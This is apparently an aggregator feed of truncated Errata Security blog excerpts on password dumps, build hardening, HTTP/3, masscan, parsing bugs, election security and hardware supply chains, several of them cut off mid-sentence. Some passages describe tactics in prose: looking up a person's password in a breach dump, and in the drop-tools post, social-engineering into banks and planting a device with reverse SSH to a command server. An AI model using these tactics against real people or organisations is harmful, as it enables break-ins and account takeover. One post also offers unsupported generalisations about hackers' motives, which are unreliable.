http://haveibeenpwned.com won't disclose the passwords, only the fact they've been pwned. However, I have a copy of that huge Collection#1 dump, so I can search it myself to get her password. As this output shows, I get a few hits, all with the same password.At this point, I have a password, but not necessarily the password to access any useful accounts. For all I know, this was the ]]> 2019-02-08T10:08:18+00:00 https://blog.erratasec.com/2019/02/how-bezos-dick-pics-mightve-been-exposed.html www.secnews.physaphae.fr/article.php?IdArticle=1020132 False Hack None None Errata Security - Errata Security Passwords in a file http://haveibeenpwned.com and entering your email address. Entering my dad's email address, I find that his accounts at Adobe, LinkedIn, and Disqus has been discovered by hackers (due to hacks of those websites) and published. I sure hope whatever these passwords were that they are not the same or similar to his passwords for GMail or his bank account.
* the lame joke at the top was my dad's, so don't blame me :-)]]>
2019-01-28T22:21:56+00:00 https://blog.erratasec.com/2019/01/passwords-in-file.html www.secnews.physaphae.fr/article.php?IdArticle=1012937 False Hack None None
Errata Security - Errata Security Notes on Build Hardening a paper about "build safety" in consumer products, describing how software is built to harden it against hackers trying to exploit bugs.What is build safety?Modern languages (Java, C#, Go, Rust, JavaScript, Python, etc.) are inherently "safe", meaning they don't have "buffer-overflows" or related problems.However, C/C++ is "unsafe", and is the most popular language for building stuff that interacts with the network. In other cases, while the language itself may be safe, it'll use underlying infrastructure ("libraries") written in C/C++. When we are talking about hardening builds, making them safe or security, we are talking about C/C++.In the last two decades, we've improved both hardware and operating-systems around C/C++ in order to impose safety on it from the outside. We do this with  options when the software is built (compiled and linked), and then when the software is run.That's what the paper above looks at: how consumer devices are built using these options, and thereby, measuring the security of these devices.In particular, we are talking about the Linux operating system here and the GNU compiler gcc. Consumer products almost always use Linux these days, though a few also use embedded Windows or QNX. They are almost always built using gcc, though some are built using a clone known as clang (or llvm).How software is builtSoftware is first compiled then linked. Compiling means translating the human-readable source code into machine code. Linking means combining multiple compiled files into a single executable.Consider a program hello.c. We might compile it using the following command:gcc -o hello hello.cThis command takes the file, hello.c, compiles it, then outputs -o an executable with the name hello.We can set additional compilation options on the command-line here. For example, to enable stack guards, we'd compile with a command that looks like the following:gcc -o hello -fstack-protector hello.cIn the following sections, we are going to look at specific options and what they do.Stack guardsA running program has various kinds of memory, optimized for different use cases. One chunk of memory is known as the stack. This is the scratch pad for functions. When a function in the code is called, the stack grows with additional scratchpad needs of that functions, then shrinks back when the function exits. As functions call other functions, which call other functions, the stack keeps growing larger and larger. When they return, it then shrinks back again.The scratch pad for each function is known as the stack frame. Among the things stored in the stack frame is the return address, where the function was called from so that when it exits, the caller of the function can continue executing where it left off.The way stack guards work is to stick a carefully constructed value in between each stack frame, known as a canary. Right before the function exits, it'll check this canary in order to validate it hasn't been corrupted. If corruption is detected, the program exits, or crashes, to prevent worse things from happening.This solves the most common exploited vulnerability in C/C++ code, the stack buffer-overflow. This is the bug described in that famous paper Smashing the Stack for Fun and Profit&]]> 2018-12-15T22:40:22+00:00 https://blog.erratasec.com/2018/12/notes-on-build-hardening.html www.secnews.physaphae.fr/article.php?IdArticle=948435 False Guideline None None Errata Security - Errata Security Notes about hacking with drop tools DarkVishnya). I thought I'd write up some more detailed notes on this.Drop toolsA common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, this was done with $200 "netbook" (cheap notebook computers). These days, it can be done with $50 "Raspberry Pi" computers, or even $25 consumer devices reflashed with Linux.A "Raspberry Pi" is a $35 single board computer, for which you'll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used everywhere from home servers, robotics, and hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.Typically what you'd do is install Kali Linux. This is a Linux "distro" that contains all the tools hackers want to use.You then drop this box physically on the victim's network. We often called these "dropboxes" in the past, but now that there's a cloud service called "Dropbox", this becomes confusing, so I guess we can call them "drop tools". The advantage of using something like a Raspberry Pi is that it's cheap: once dropped on a victim's network, you probably won't ever get it back again.Gaining physical access to even secure banks isn't that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren't not nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they'll quickly bend over an spread them if they think you are a regulator. Or, you can pretend to be maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that's not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You'll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas without going through all this.Now that you've got your evil box installed, there is the question of how you remotely access it. It's almost certainly firewalled, preventing any inbound connection.One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts to a command-and-control server. Another alternative is to create a SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization's outbound traffic can notice these connections.Another alternative is to use the WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it's not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as sticking a second Raspberry Pi in a nearby bar that is close enough to connection, and then use the bar's Internet connection to hop-scotch on in.]]> 2018-12-11T22:59:55+00:00 https://blog.erratasec.com/2018/12/notes-about-hacking-with-drop-tools.html www.secnews.physaphae.fr/article.php?IdArticle=942988 False Vulnerability None None Errata Security - Errata Security Some notes about HTTP/3 SPDY (HTTP/2) is already supported by the major web browser (Chrome, Firefox, Edge, Safari) and major web servers (Apache, Nginx, IIS, CloudFlare). Many of the most popular websites support it (even non-Google ones), though you are unlikely to ever see it on the wire (sniffing with Wireshark or tcpdump), because it's always encrypted with SSL. While the standard allows for HTTP/2 to run raw over TCP, all the implementations only use it over SSL.There is a good lesson here about standards. Outside the Internet, standards are often de jure, run by government, driven by getting all major stakeholders in a room and hashing it out, then using rules to force people to adopt it. On the Internet, people implement things first, and then if others like it, they'll start using it, too. Standards are often de facto, with RFCs being written for what is already working well on the Internet, documenting what people are already using. SPDY was adopted by browsers/servers not because it was standardized, but because the major players simply started adding it. The same is happening with QUIC: the fact that it's being standardized as HTTP/3 is a reflection that it's already being used, rather than some milestone that now that it's standardized that people can start using it.QUIC is really more of a new version of TCP (TCP/2???) than a new version of HTTP (HTTP/3). It doesn't really change what HTTP/2 does so much as change how the transport works. Therefore, my comments below are focused on transport issues rather than HTTP issues.The major headline feature is faster connection setup and latency. TCP requires a number of packets being sent back-and-forth before the connection is established. SSL again requires a number of packets sent back-and-forth before encryption is established. If there is a lot of network delay, such as when people use satellite Internet with half-second ping times, it can take quite a long time for a connection to be established. By reducing round-trips, connections get setup faster, so that when you click on a link, the linked resource pops up immediatelyThe next headline feature is bandwidth. There is always a bandwidth limitation between source and destination of a network connection, which is almost always due to congestion. Both sides need to discover this speed so that they can send packets at just the right rate. Sending packets too fast, so that they'll get dropped, causes even more congestion for others without improving transfer rate. Sending packets too slowly means unoptimal use of the network.How HTTP traditionally does this is bad. Using a single TCP connection didn't work for HTTP because interactions with websites require multiple things to be transferred simultaneously, so browsers opened multiple connections to the web server (typically 4). However, this breaks the bandwidth estimation, because each of your TCP connections is trying to do it independently as if the other connections don't exist. SPDY addressed this by its multiplexing feature that combined multiple interactions between browser/server with a single bandwidth calculation.QUIC extends this multiplexing, making it even easier to handle multiple interactions between the browser/server, without any one interaction blocking another, but with a common bandwidth estimation. This will make interactions smoother from a user's perspective, while ]]> 2018-11-18T19:51:36+00:00 https://blog.erratasec.com/2018/11/some-notes-about-http3.html www.secnews.physaphae.fr/article.php?IdArticle=905495 False None None None Errata Security - Errata Security Brian Kemp is bad on cybersecurity failed hacking attempt".According to news stories, state elections websites are full of common vulnerabilities, those documented by the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed, as allowing a hacker to cancel registrations of those of the other party.Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to test are insecure. This concept is the basis for many policy initiatives at the federal level, to not only protect researchers probing for weaknesses from prosecution, but to even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this.But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315 that criminalized this activity of merely attempting to access a computer without permission, to probe for possibly vulnerabilities. To the ignorant and backwards person, this seems reasonable, of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only outlaws your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election meddling hackers are not deterred by such laws, only Georgia residents concerned whether their government websites are secure.It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month you have your Windows desktop or iPhone nagging you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities.It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems).Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fix them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. 10 years ago, such activity wasn't safe.The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not supp]]> 2018-11-04T18:22:46+00:00 https://blog.erratasec.com/2018/11/brian-kemp-is-bad-on-cybersecurity.html www.secnews.physaphae.fr/article.php?IdArticle=879735 False Vulnerability,Threat,Guideline None None Errata Security - Errata Security Why no cyber 9/11 for 15 years? hasn't there been a cyber-terrorist attack for the last 15 years, or as it phrases it:National-security experts have been warning of terrorist cyberattacks for 15 years. Why hasn't one happened yet?As a pen-tester whose broken into power grids and found 0day exploits in control center systems, I thought I'd write up some comments.Instead of asking why one hasn't happened yet, maybe we should instead ask why national-security experts keep warning about them.One possible answer is that national-security experts are ignorant. I get the sense that "national security experts" have very little expertise in cyber. That's why I include a brief resume at the top of this article, I've actually broken into a power grid and found 0days in critical power grid products (specifically, the ABB implementation of ICCP on AIX -- it's rather an obvious buffer-overflow, *cough* ASN.1 *cough*, I don't know if they ever fixed it).Another possibility is that they are fear mongering in order to support their agenda. That's the problem with "experts", they get their expertise by being employed to achieve some goal. The ones who know most about an issue are simultaneously the ones most biased about an issue. They have every incentive to make people be afraid, and little incentive to tell the truth.The most likely answer, though, is simply because they can. Anybody can warn of "digital 9/11" and be taken seriously, regardless of expertise. They'll get all the press. It's always the Morally Right thing to say. You never have to back it up with evidence. Conversely, those who say the opposite don't get the same level of press, and are frequently challenged to defend their abnormal stance.Indeed, that's this article by The Atlantic works. It's entire premise is that the national security experts are still "right" even though their predictions haven't happened, and it's reality that's "wrong".Now let's consider the original question.One good answer in the article is "cause certain types of fear and terror, that garner certain media attention, that galvanize followers". Blowing something up causes more fear in the target population than deleting some data.But the same is true of the terrorists themselves, that they prefer violence. In other words, what motivates terrorists, the ends or the means? It is it the need to achieve a political goal? Or is it simply about looking for an excuse to commit violence?I suspect that it's the later issue. It's not that terrorists are violent so much as violent people are attracted to terrorism. This can explain a lot, such as why they have such poor op-sec and encryption, as I've written about before. They enjoy learning how to shoot guns and trigger bombs, but they don't enjoy learning how to use a computer correctly.I've explored the cyber Islamic dark web and come to a couple conclusions about it. The primary motivation of these hackers is gay porn. A frequent initiation rite to gain access to these forums is to send post pictures of your, well, equipment. Such things are repressed in their native countries and societies, so hacking becomes a necessary skill in order to get it.It's hard for us to understand their motivations. From our western perspective, we'd think gay young men would be on our side, motivated to fight against their own governments in defense of gay rights, in order to achieve marriage equality. None of them want that. Their goal is to get married and have children. Sure, they want gay sex and intimate relationships with men, but they also want a subservient wife who manages the household, and the deep family ties that ]]> 2018-11-02T02:57:36+00:00 https://blog.erratasec.com/2018/11/why-no-cyber-911-for-15-years.html www.secnews.physaphae.fr/article.php?IdArticle=875797 False Hack None None Errata Security - Errata Security Masscan and massive address lists @nmap scanning with big exclusion lists, things are about to get a lot faster. ;)- Daniel Miller ✝ (@bonsaiviking) November 1, 2018Both nmap and masscan are port scanners. The differences is that nmap does an intensive scan on a limited range of addresses, whereas masscan does a light scan on a massive range of addresses, including the range of 0.0.0.0 - 255.255.255.255 (all addresses). If you've got a 10-gbps link to the Internet, it can scan the entire thing in under 10 minutes, from a single desktop-class computer.How massan deals with exclude ranges is probably its defining feature. That seems kinda strange, since it's a little used feature in nmap. But when you scan the entire list, people will complain, with nasty emails, so you are going to build up a list of hundreds, if not thousands, of addresses to exclude from your scans.Therefore, the first design choice is to combine the two lists, the list of targets to include and the list of targets to exclude. Other port scanners don't do this because they typically work from a large include list and a short exclude list, so they optimize for the larger thing. In mass scanning the Internet, the exclude list is the largest thing, so that's what we optimize for. It makes sense to just combine the two lists.So the performance now isn't how to lookup an address in an exclude list efficiently, it's how to quickly choose a random address from a large include target list.Moreover, the decision is how to do it with as little state as possible. That's the trick for sending massive numbers of packets at rates of 10 million packets-per-second, it's not keeping any bookkeeping of what was scanned. I'm not sure exactly how nmap randomizes it's addresses, but the documentation implies that it does a block of a addresses at a time, and randomizes that block, keeping state on which addresses it's scanned and which ones it hasn't.The way masscan is not to randomly pick an IP address so much as to randomize the index.To start with, we created a sorted list of IP address ranges, the targets. The total number of IP addresses in all the ranges is target_count (not the number of ranges but the number of all IP addresses). We then define a function pick() that returns one of those IP addresses given the index:    ip = pick(targets, index);Where index is in the range [0..target_count].This function is just a binary search. After the ranges have been sorted, a start_index value is added to each range, which is the total number of IP addresses up to that point. Thus, given a random index, we search the list of start_index values to find which range we've chosen, and then which IP address address within that range. The function is here, though reading it, I realize I need to refactor it to make it clearer. (I read the comments telling me to refactor it, and I realize I haven't gotten around to that yet :-).Given this system, we can now do an in-order (not randomized) port scan by doing the follow]]> 2018-11-01T02:03:51+00:00 https://blog.erratasec.com/2018/11/masscan-and-massive-address-lists.html www.secnews.physaphae.fr/article.php?IdArticle=873924 False None None None Errata Security - Errata Security Systemd is bad parsing and should feel bad In the late 1990s and early 2000s, we learned that parsing input is a problem. The traditional ad hoc approach you were taught in school is wrong. It's wrong from an abstract theoretical point of view. It's wrong from the practical point of view, error prone and leading to spaghetti code.The first thing you need to unlearn is byte-swapping. I know that this was some sort epiphany you had when you learned network programming but byte-swapping is wrong. If you find yourself using a macro to swap bytes, like the be16toh() macro used in this code, then you are doing it wrong.But, you say, the network byte-order is big-endian, while today's Intel and ARM processors are little-endian. So you have to swap bytes, don't you?No. As proof of the matter I point to every other language other than C/C++. They don't don't swap bytes. Their internal integer format is undefined. Indeed, something like JavaScript may be storing numbers as a floating points. You can't muck around with the internal format of their integers even if you wanted to.An example of byte swapping in the code is something like this:In this code, it's taking a buffer of raw bytes from the DHCPv6 packet and "casting" it as a C internal structure. The packet contains a two-byte big-endian length field, "option->len", which the code must byte-swap in order to use.Among the errors here is casting an internal structure over external data. From an abstract theory point of view, this is wrong. Internal structures are undefined. Just because you can sort of know the definition in C/C++ doesn't change the fact that they are still undefined.From a practical point of view, this leads to confusion, as the programmer is never quite clear as to the boundary between external and internal data. You are supposed to rigorously verify external data, because the hacker controls it. You don't keep double-checking and second-guessing internal data, because that would be stupid. When you blur the lines between internal and external data, then your checks get muddled up.Yes you can, in C/C++, cast an internal structure over external data. But just because you can doesn't mean you should. What you should do instead is parse data the same way as if you were writing code in JavaScript. For example, to grab the DHCP6 option length field, you should write something like:]]> 2018-10-27T07:28:06+00:00 https://blog.erratasec.com/2018/10/systemd-is-bad-parsing-and-should-feel.html www.secnews.physaphae.fr/article.php?IdArticle=865868 False Guideline None None Errata Security - Errata Security Masscan as a lesson in TCP/IP For example, here is a screenshot of running masscan to scan a single target from my laptop computer. My machine has an IP address of 10.255.28.209, but masscan runs with an address of 10.255.28.250. This works fine, with the program contacting the target computer and downloading information -- even though it has the 'wrong' IP address. That's because it isn't using the network stack of the notebook computer, and hence, not using the notebook's IP address. Instead, it has its own network stack and its own IP address.At this point, it might be useful to describe what masscan is doing here. It's a "port scanner", a tool that connects to many computers and many ports to figure out which ones are open. In some cases, it can probe further: once it connects to a port, it can grab banners and version information.In the above example, the parameters to masscan used here are:-p80 : probe for port "80", which is the well-known port assigned for web-services using the HTTP protocol--banners : do a "banner check", grabbing simple information from the target depending on the protocol. In this case, it grabs the "title" field from the HTML from the server, and also grabs the HTTP headers. It does different banners for other protocols.--source-ip 10.255.28.250 : this configures the IP address that masscan will use172.217.197.113 : the target to be scanned. This happens to be a Google server, by the way, though that's not really important.Now let's change the IP address that masscan is using to something completely different, like 1.2.3.4. The difference from the above screenshot is that we no longer get any data in response. Why is that?]]> 2018-10-23T20:03:42+00:00 https://blog.erratasec.com/2018/10/masscan-as-lesson-in-tcpip.html www.secnews.physaphae.fr/article.php?IdArticle=859495 False Guideline None None Errata Security - Errata Security Some notes for journalists about cybersecurity The recent Bloomberg article about Chinese hacking motherboards is a great opportunity to talk about problems with journalism.Journalism is about telling the truth, not a close approximation of the truth,  but the true truth. They don't do a good job at this in cybersecurity.Take, for example, a recent incident where the Associated Press fired a reporter for photoshopping his shadow out of a photo. The AP took a scorched-earth approach, not simply firing the photographer, but removing all his photographs from their library.That's because there is a difference between truth and near truth.Now consider Bloomberg's story, such as a photograph of a tiny chip. Is that a photograph of the actual chip the Chinese inserted into the motherboard? Or is it another chip, representing the size of the real chip? Is it truth or near truth?Or consider the technical details in Bloomberg's story. They are garbled, as this discussion shows. Something like what Bloomberg describes is certainly plausible, something exactly what Bloomberg describes is impossible. Again there is the question of truth vs. near truth.There are other near truths involved. For example, we know that supply chains often replace high-quality expensive components with cheaper, lower-quality knockoffs. It's perfectly plausible that some of the incidents Bloomberg describes is that known issue, which they are then hyping as being hacker chips. This demonstrates how truth and near truth can be quite far apart, telling very different stories.Another example is a NYTimes story about a terrorist's use of encryption. As I've discussed before, the story has numerous "near truth" errors. The NYTimes story is based upon a transcript of an interrogation of the hacker. The French newspaper Le Monde published excerpts from that interrogation, with details that differ slightly from the NYTimes article.One the justifications journalists use is that near truth is easier for their readers to understand. First of all, that's not justification for false hoods. If the words mean something else, then it's false. It doesn't matter if its simpler. Secondly, I'm not sure they actually are easier to understand. It's still techy gobbledygook. In the Bloomberg article, if I as an expert can't figure out what actually happened, then I know that the average reader can't, either, no matter how much you've "simplified" the language.Stories can solve this by both giving the actual technical terms that experts can understand, then explain them. Yes, it eats up space, but if you care about the truth, it's necessary.In groundbreaking stories like Bloomberg's, the length is already enough that the average reader won't slog through it. Instead, it becomes a seed for lots of other coverage that explains the story. In such cases, you want to get the techy details, the actual truth, correct, so that we experts can stand behind the story and explain it. Otherwise, going for the simpler near truth means that all us experts simply question the veracity of the story.The companies mentioned in the Bloomberg story have called it an out]]> 2018-10-22T16:33:56+00:00 https://blog.erratasec.com/2018/10/some-notes-for-journalists-about.html www.secnews.physaphae.fr/article.php?IdArticle=857082 False Hack None None Errata Security - Errata Security TCP/IP, Sockets, and SIGPIPE This description is accurate. The "Sockets" network APIs was based on the "pipes" interprocess communication when TCP/IP was first added to the Unix operating system back in 1981. This made it straightforward and comprehensible to the programmers at the time. This SIGPIPE behavior made sense when piping the output of one program to another program on the command-line, as is typical under Unix: if the receiver of the data crashes, then you want the sender of the data to also stop running. But it's not the behavior you want for networking. Server processes need to continue running even if a client crashes.But Steven's description is insufficient. It portrays this problem as optional, that only exists if the other side of the connection is misbehaving. He never mentions the problem outside this section, and none of his example code handles the problem. Thus, if you base your code on Steven's, it'll inherit this problem and sometimes crash.The simplest solution is to configure the program to ignore the signal, such as putting the following line of code in your main() function:   signal(SIGPIPE, SIG_IGN);If you search popular projects, you'll find that this there solution most of the time, such as openssl.But there is a problem with this approach, as OpenSSL demonstrates: it's both a command-line program and a library. The command-line program handles this error, but the library doesn't. This means that using the SSL_write() function to send encrypted data may encounter this error. Nowhere in the OpenSSL documentation does it mention that the user of the library needs to handle this.Ideally, library writers would like to deal with the problem internally. There are platform-specific ways to deal with this. On Linux, an additional parameter MSG_NOSIGNAL can be added to the send() function. On BSD (including macOS), setsockopt(SO_NOSIGPIPE) can be configured for the socket when it's created (after socket() or after accept()). On Windows and some other operating systems, the SIGPIPE isn't even generated, so nothing needs to be done for those platforms.But it's difficult. Browsing through cross platform projects like curl, which tries this library technique, I see the following bit:#ifdef __SYMBIAN32__/* This isn't actually supported under Symbian OS */#undef SO_NOSIGPIPE]]> 2018-10-21T18:10:54+00:00 https://blog.erratasec.com/2018/10/tcpip-sockets-and-sigpipe.html www.secnews.physaphae.fr/article.php?IdArticle=855595 False Guideline None None Errata Security - Errata Security Election interference from Uber and Lyft announcements by Uber and Lyft that they'll provide free rides to the polls on election day. This well-meaning gesture nonetheless calls into question how this might influence the election."Free rides" to the polls is a common thing. Taxi companies have long offered such services for people in general. Political groups have long offered such services for their constituencies in particular. Political groups target retirement communities to get them to the polls, black churches have long had their "Souls to the Polls" program across the 37 states that allow early voting on Sundays.But with Uber and Lyft getting into this we now have concerns about "big data", "algorithms", and "hacking".As the various Facebook controversies have taught us, these companies have a lot of data on us that can reliably predict how we are going to vote. If their leaders wanted to, these companies could use this information in order to get those on one side of an issue to the polls. On hotly contested elections, it wouldn't take much to swing the result to one side.Even if they don't do this consciously, their various algorithms (often based on machine learning and AI) may do so accidentally. As is frequently demonstrated, unconscious biases can lead to real world consequences, like facial recognition systems being unable to read Asian faces.Lastly, it makes these companies prime targets for Russian hackers, who may take all these into account when trying to muck with elections. Or indeed, to simply claim that they did in order to call the results into question. Though to be fair, Russian hackers have so many other targets of opportunity. Messing with the traffic lights of a few cities would be enough to swing a presidential election, specifically targeting areas with certain voters with traffic jams making it difficult for them to get to the polls.Even if it's not "hackers" as such, many will want to game the system. For example, politically motivated drivers may choose to loiter in neighborhoods strongly on one side or the other, helping the right sorts of people vote at the expense of not helping the wrong people. Likewise, drivers might skew the numbers by deliberately hailing rides out of opposing neighborhoods and taking them them out of town, or to the right sorts of neighborhoods.I'm trying to figure out which Party this benefits the most. Let's take a look at rider demographics to start with, such as this post. It appears that income levels and gender are roughly evenly distributed.Ridership is skewed urban, with riders being 46% urban, 48% suburban, and 6% rural. In contrast, US population is 31% urban, 55% suburban, and 15% rural. Giving the increasing polarization among rural and urban voters, this strongly skews results in favor of Democrats.Likewise, the above numbers show that Uber ridership is strongly skewed to the younger generation, with 55% of the riders 34 and younger. This again strongly skews "free rides" by Uber and Lyft toward the Democrats. Though to be fair, the "over 65" crowd has long had an advantage as the parties have fallen over themselves to bus people from retirement communities to the polls (and that older people can get free time on weekdays to vote).Even if you are on the side that appears to benefit, this should still concern you. Our allegiance should first be to a robust and fa]]> 2018-10-19T19:24:46+00:00 https://blog.erratasec.com/2018/10/election-interference-from-uber-and-lyft.html www.secnews.physaphae.fr/article.php?IdArticle=855273 False Guideline Uber None Errata Security - Errata Security Notes on the UK IoT cybersec "Code of Practice" 2018-10-16T17:06:57+00:00 https://blog.erratasec.com/2018/10/notes-on-uk-iot-cybersec-code-of.html www.secnews.physaphae.fr/article.php?IdArticle=850709 False Hack None None Errata Security - Errata Security How to irregular cyber warfare @thegrugq) pointed me to this article on "Lessons on Irregular Cyber Warfare", citing the masters like Sun Tzu, von Clausewitz, Mao, Che, and the usual characters. It tries to answer:...as an insurgent, which is in a weaker power position vis-a-vis a stronger nation state; how does cyber warfare plays an integral part in the irregular cyber conflicts in the twenty-first century between nation-states and violent non-state actors or insurgenciesI thought I'd write a rebuttal.None of these people provide any value. If you want to figure out cyber insurgency, then you want to focus on the technical "cyber" aspects, not "insurgency". I regularly read military articles about cyber written by those, like in the above article, which demonstrate little experience in cyber.The chief technical lesson for the cyber insurgent is the Birthday Paradox. Let's say, hypothetically, you go to a party with 23 people total. What's the chance that any two people at the party have the same birthday? The answer is 50.7%. With a party of 75 people, the chance rises to 99.9% that two will have the same birthday.The paradox is that your intuitive way of calculating the odds is wrong. You are thinking the odds are like those of somebody having the same birthday as yourself, which is in indeed roughly 23 out of 365. But we aren't talking about you vs. the remainder of the party, we are talking about any possible combination of two people. This dramatically changes how we do the math.In cryptography, this is known as the "Birthday Attack". One crypto task is to uniquely fingerprint documents. Historically, the most popular way of doing his was with an algorithm known as "MD5" which produces 128-bit fingerprints. Given a document, with an MD5 fingerprint, it's impossible to create a second document with the same fingerprint. However, with MD5, it's possible to create two documents with the same fingerprint. In other words, we can't modify only one document to get a match, but we can keep modifying two documents until their fingerprints match. Like a room, finding somebody with your birthday is hard, finding any two people with the same birthday is easier.The same principle works with insurgencies. Accomplishing one specific goal is hard, but accomplishing any goal is easy. Trying to do a narrowly defined task to disrupt the enemy is hard, but it's easy to support a group of motivated hackers and let them do any sort of disruption they can come up with.The above article suggests a means of using cyber to disrupt a carrier attack group. This is an example of something hard, a narrowly defined attack that is unlikely to actually work in the real world.Conversely, consider the attacks attributed to North Korea, like those against Sony or the Wannacry virus. These aren't the careful planning of a small state actor trying to accomplish specific goals. These are the actions of an actor that supports hacker groups, and lets them loose without a lot of oversight and direction. Wannacry in particular is an example of an undirected cyber attack. We know from our experience with network worms that its effects were impossible to predict. Somebody just stuck the newly discovered NSA EternalBlue payload into an existing virus framework and let it run to see what happens. As we worm experts know, nobody could have predicted the results of doing so, not even its creators.Another example is the DNC election hacks. The reason we can attribute them to Russia is because it wasn't their narrow goal. Instead, by looking at things like their URL shortener, we can see that they flailed around broadly all over cyberspace. The DNC was just one of thei]]> 2018-10-14T04:57:46+00:00 https://blog.erratasec.com/2018/10/how-to-irregular-cyber-warfare.html www.secnews.physaphae.fr/article.php?IdArticle=846347 False Hack,Guideline Wannacry None Errata Security - Errata Security Notes on the Bloomberg Supermicro supply chain hack story The story is based on anonymous sources, and not even good anonymous sources. An example is this attribution:a person briefed on evidence gathered during the probe saysThat means somebody not even involved, but somebody who heard a rumor. It also doesn't the person even had sufficient expertise to understand what they were being briefed about.The technical detail that's missing from the story is that the supply chain is already messed up with fake chips rather than malicious chips. Reputable vendors spend a lot of time ensuring quality, reliability, tolerances, ability to withstand harsh environments, and so on. Even the simplest of chips can command a price premium when they are well made.What happens is that other companies make clones that are cheaper and lower quality. They are just good enough to pass testing, but fail in the real world. They may not even be completely fake chips. They may be bad chips the original manufacturer discarded, or chips the night shift at the factory secretly ran through on the equipment -- but with less quality control.The supply chain description in the Bloomberg story is accurate, except that in fails to discuss how these cheap, bad chips frequently replace the more expensive chips, with contract manufacturers or managers skimming off the profits. Replacement chips are real, but whether they are for malicious hacking or just theft is the sticking point.For example, consider this listing for a USB-to-serial converter using the well-known FTDI chip. The word "genuine" is in the title, because fake FTDI chips are common within the supply chain. As you can see form the $11 price, the amount of money you can make with fake chips is low -- these contract manufacturers hope to make it up in volume.The story implies that Apple is lying in its denials of malicious hacking, and deliberately avoids this other supply chain issue. It's perfectly reasonable for Apple to have rejected Supermicro servers because of bad chips that have nothing to do with hacking.If there's hacking going on, it may not even be Chinese intelligence -- the manufacturing process is so lax that any intelligence agency could be responsible. Just because most manufacturing of server motherboards happen in China doesn't point the finger to Chinese intelligence as being the ones responsible.Finally, I want to point out the sensationalism of the story. It spends much effort focusing on the invisible nature of small chips, as evidence that somebody is trying to hide something. That the chips are so small means nothing: except for the major chips, all the chips on a motherboard are small. It's hard to have large chips, except for the big things like the CPU and DRAM. Serial ROMs containing firmware are never going to be big, because they just don't hold that much information.A fake serial ROM is the focus here not so much because that's the chip they found by accident, but that's the chip they'd look for. The chips contain the firmware for other hardware devices on the motherboard. Thus, instead of designing complex hardware to do malicious things, a hacker simply has to make simple changes t]]> 2018-10-04T16:36:51+00:00 https://blog.erratasec.com/2018/10/notes-on-bloomberg-supermicro-supply.html www.secnews.physaphae.fr/article.php?IdArticle=830749 False Hack None None Errata Security - Errata Security Mini pwning with GL-iNet AR150 Unfortunately, these devices had extraordinarily limited memory (16-megabytes) and even more limited storage (4-megabyte). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger.I'm interested in that device for the simple reason that it has a big-endian CPU.All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian. Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte-order as Intel. On the other hand, popular file-formats and crypto-algorithms use big-endian, so there's some efficiency to be gained with going with that choice.I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.An alternative is the GL-AR150. This is a company who sells commercial WiFi products like the other vendors, but who caters to hackers and hobbyists. Recognizing the popularity of that TP-LINK device, they  essentially made a clone with more stuff, with 16-megabytes of storage and 64-megabytes of RAM. They intend for people to rip off the case and access the circuit board directly: they've included the pins for a console serial port to be directly connected, connectors of additional WiFi antennas, and pads for soldering wires to GPIO pins for hardware projects. It's a thing of beauty.So this post is about the steps I took to get things working for myself.The first step is to connect to the device. One way to do this is connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.The problem with their Ethernet port is that you have to manually set your IP address. Their address is 192.168.8.1. I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into 